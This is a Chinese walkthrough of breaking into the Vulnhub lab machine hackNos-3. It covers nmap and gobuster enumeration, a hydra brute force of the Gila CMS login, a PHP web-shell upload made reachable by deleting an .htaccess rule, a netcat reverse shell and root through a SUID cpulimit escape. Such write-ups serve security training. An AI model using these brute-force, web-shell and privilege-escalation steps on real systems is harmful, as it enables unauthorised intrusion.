Vulnhub之HackNos 3靶机详细测试过程
HackNos 3
作者: Jason Huawen
靶机信息
名称:hackNos: Os-hackNos-3
地址:
https://www.vulnhub.com/entry/hacknos-os-hacknos-3,410/
识别目标主机IP地址
─(kali㉿kali)-[~/Desktop/HackNos3]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:0e:88:2f 1 60 PCS Systemtechnik GmbH
192.168.56.231 08:00:27:92:85:a4 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.231
NMAP扫描
──(kali㉿kali)-[~/Desktop/HackNos3]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.231 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-24 00:00 EDT
Nmap scan report for bogon (192.168.56.231)
Host is up (0.00013s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ce:16:a0:18:3f:74:e9:ad:cb:a9:39:90:11:b8:8a:2e (RSA)
| 256 9d:0e:a1:a3:1e:2c:4d:00:e8:87:d2:76:8c:be:71:9a (ECDSA)
|_ 256 63:b3:75:98:de:c1:89:d9:92:4e:49:31:29:4b:c0:ad (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: WebSec
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:92:85:A4 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.21 seconds
NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、80(http)
获得Shell
──(kali㉿kali)-[~/Desktop/Vulnhub/HackNos3]
└─$ nikto -h http://192.168.56.231
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.231
+ Target Hostname: 192.168.56.231
+ Target Port: 80
+ Start Time: 2023-03-24 00:23:37 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /scripts/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /, inode: c3, size: 599925bee00f9, mtime: gzip
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET
+ 8725 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time: 2023-03-24 00:24:40 (GMT-4) (63 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.41) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
──(kali㉿kali)-[~/Desktop/Vulnhub/HackNos3]
└─$ gobuster dir -u http://192.168.56.231 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.js,.sh
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.231
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: php,html,txt,js,sh
[+] Timeout: 10s
===============================================================
2023/03/24 00:29:36 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 195]
/scripts (Status: 301) [Size: 318] [--> http://192.168.56.231/scripts/]
/upload.php (Status: 200) [Size: 0]
/devil (Status: 301) [Size: 316] [--> http://192.168.56.231/devil/]
/websec (Status: 301) [Size: 317] [--> http://192.168.56.231/websec/]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1321485 / 1323366 (99.86%)
===============================================================
2023/03/24 00:34:38 Finished
==============================================================
Gobuster工具扫描出目录:/websec, 访问该目录,网页中有电子邮件,而且从页面内容来看,为CMS,因此度websec进一步扫描:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HackNos3]
└─$ gobuster dir -u http://192.168.56.231/websec -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.js,.sh
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.231/websec
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: txt,js,sh,php,html
[+] Timeout: 10s
===============================================================
2023/03/24 02:54:11 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/index (Status: 200) [Size: 4348]
/search (Status: 200) [Size: 4348]
/about (Status: 200) [Size: 3756]
/blog (Status: 200) [Size: 4348]
/1.sh (Status: 200) [Size: 4647]
/1.txt (Status: 200) [Size: 4647]
/1 (Status: 200) [Size: 4647]
/1.html (Status: 200) [Size: 4647]
/01.php (Status: 200) [Size: 4647]
/01.txt (Status: 200) [Size: 4647]
/1.php (Status: 200) [Size: 4647]
/1.js (Status: 200) [Size: 4647]
/01 (Status: 200) [Size: 4647]
/01.html (Status: 200) [Size: 4647]
/01.sh (Status: 200) [Size: 4647]
/01.js (Status: 200) [Size: 4647]
/login (Status: 200) [Size: 1592]
从/websec的扫描中可以看到有登录入口/login以及管理员目录/admin,并且websec首页中的邮箱为管理员邮箱,即猜测[contact@hacknos.com]为管理员账号,但是接下来需要爆破密码
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HackNos3]
└─$ hydra -l contact@hacknos.com -P dict 192.168.56.231 http-post-form '/websec/login:username=^USER^&password=^PASS^:F=Wrong'
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-24 03:06:59
[DATA] max 16 tasks per 1 server, overall 16 tasks, 54 login tries (l:1/p:54), ~4 tries per task
[DATA] attacking http-post-form://192.168.56.231:80/websec/login:username=^USER^&password=^PASS^:F=Wrong
[80][http-post-form] host: 192.168.56.231 login: contact@hacknos.com password: Securityx
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-24 03:07:02
利用hydra工具成功破解出了密码
登录成功后,访问其/admin目录
http://192.168.56.231/websec/admin
通过file manager功能上传shell.php,没有任何过滤,发现文件被放在了/assets目录,但是访问该目录返回错误
在该目录中发现了.htaccess
文件禁止访问php文件,那么将deny from all
删除后保存。
http://192.168.56.231/websec/assets/shell.php
可以成功得到shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HackNos3]
└─$ sudo nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.56.230] from (UNKNOWN) [192.168.56.231] 33922
Linux hacknos 5.3.0-24-generic #26-Ubuntu SMP Thu Nov 14 01:33:18 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
05:07:33 up 1:16, 0 users, load average: 0.00, 0.21, 1.16
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@hacknos:/$ ls
ls
bin etc lib lost+found proc snap tmp vmlinuz.old
boot home lib32 media root srv usr
cdrom initrd.img lib64 mnt run swap.img var
dev initrd.img.old libx32 opt sbin sys vmlinuz
www-data@hacknos:/$ cd /home
cd /home
www-data@hacknos:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K Dec 10 2019 .
drwxr-xr-x 20 root root 4.0K Dec 10 2019 ..
drwxr-xr-x 6 blackdevil docker 4.0K Dec 13 2019 blackdevil
www-data@hacknos:/home$ cd blackdevil
cd blackdevil
www-data@hacknos:/home/blackdevil$ ls -alh
ls -alh
total 40K
drwxr-xr-x 6 blackdevil docker 4.0K Dec 13 2019 .
drwxr-xr-x 3 root root 4.0K Dec 10 2019 ..
-rw-r--r-- 1 blackdevil docker 220 May 5 2019 .bash_logout
-rw-r--r-- 1 blackdevil docker 3.7K May 5 2019 .bashrc
drwx------ 3 blackdevil docker 4.0K Dec 13 2019 .cache
drwxr-xr-x 3 blackdevil docker 4.0K Dec 13 2019 .config
drwx------ 3 blackdevil docker 4.0K Dec 10 2019 .gnupg
drwxr-xr-x 3 blackdevil docker 4.0K Dec 13 2019 .local
-rw-r--r-- 1 blackdevil docker 807 May 5 2019 .profile
-rw-r--r-- 1 root root 33 Dec 13 2019 user.txt
www-data@hacknos:/home/blackdevil$ cat user.txt
cat user.txt
bae11ce4f67af91fa58576c1da2aad4b
www-data@hacknos:/home/blackdevil$
成功拿到了目标主机反弹回来的Shell,以及User Flag.接下来需要进行提权:
www-data@hacknos:/var/www/html/websec$ cat config.php
cat config.php
<?php
$GLOBALS['config'] = array (
'db' =>
array (
'host' => 'localhost',
'user' => 'cmsu',
'pass' => 'securityx',
'name' => 'cms',
),
'permissions' =>
array (
1 =>
array (
0 => 'admin',
1 => 'admin_user',
2 => 'admin_userrole',
),
),
'packages' =>
array (
0 => 'blog',
),
'base' => 'http://192.168.1.20/websec/',
'theme' => 'startbootstrap-creative',
'title' => 'Gila CMS',
'slogan' => 'An awesome website!',
'default-controller' => 'blog',
'timezone' => 'America/Mexico_City',
'ssl' => '',
'env' => 'pro',
'check4updates' => 1,
'language' => 'en',
'admin_email' => 'contact@hacknos.com',
'rewrite' => true,
);www-data@hacknos:/var/www/html/websec$
虽然拿到了数据库连接的用户名和密码,但是登入数据库没有什么有价值的信息
提权
将linpeas.sh脚本上传至目标主机/tmp目录,修改权限,并执行该脚本:
-rwsr-xr-x 1 root root 31K Jul 6 2019 /usr/bin/cpulimit
可利用cpulimit的SUID位进行提权
www-data@hacknos:/tmp$ /usr/bin/cpulimit -l 100 -f -- /bin/sh -p
/usr/bin/cpulimit -l 100 -f -- /bin/sh -p
Process 2225 detected
# cd /root
cd /root
# ls -alh
ls -alh
total 56K
drwx------ 8 root root 4.0K Dec 14 2019 .
drwxr-xr-x 20 root root 4.0K Dec 10 2019 ..
-rw------- 1 root root 162 Dec 14 2019 .bash_history
-rw-r--r-- 1 root root 3.1K Aug 27 2019 .bashrc
drwx------ 2 root root 4.0K Dec 13 2019 .cache
drwxr-xr-x 3 root root 4.0K Dec 13 2019 .composer
drwx------ 3 root root 4.0K Dec 13 2019 .gnupg
drwxr-xr-x 3 root root 4.0K Dec 13 2019 .local
-rw-r--r-- 1 root root 148 Aug 27 2019 .profile
drwx------ 2 root root 4.0K Dec 10 2019 .ssh
-rw------- 1 root root 6.5K Dec 13 2019 .viminfo
-rw-r--r-- 1 root root 547 Dec 13 2019 root.txt
drwxr-xr-x 3 root root 4.0K Dec 10 2019 snap
# cat root.txt
cat root.txt
######## ##### ##### ######## ########
## ## ## ## ## ## ## ## ##
## ## ## ## ## ## ## ## ##
######## ## ## ## ## ## ########
## ## ## ## ## ## ## ## ##
## ## ## ## ## ## ## ## ##
## ## ##### ##### ## ####### ## ##
MD5-HASH: bae11ce4f67af91fa58576c1da2aad4b
Author: Rahul Gehlaut
Blog: www.hackNos.com
Linkedin: https://in.linkedin.com/in/rahulgehlaut
#
成功拿到root shell以及root flag
STRIVE FOR PROGRESS,NOT FOR PERFECTION
热门相关:地球第一剑 刺客之王 仗剑高歌 第一神算:纨绔大小姐 网游之逆天飞扬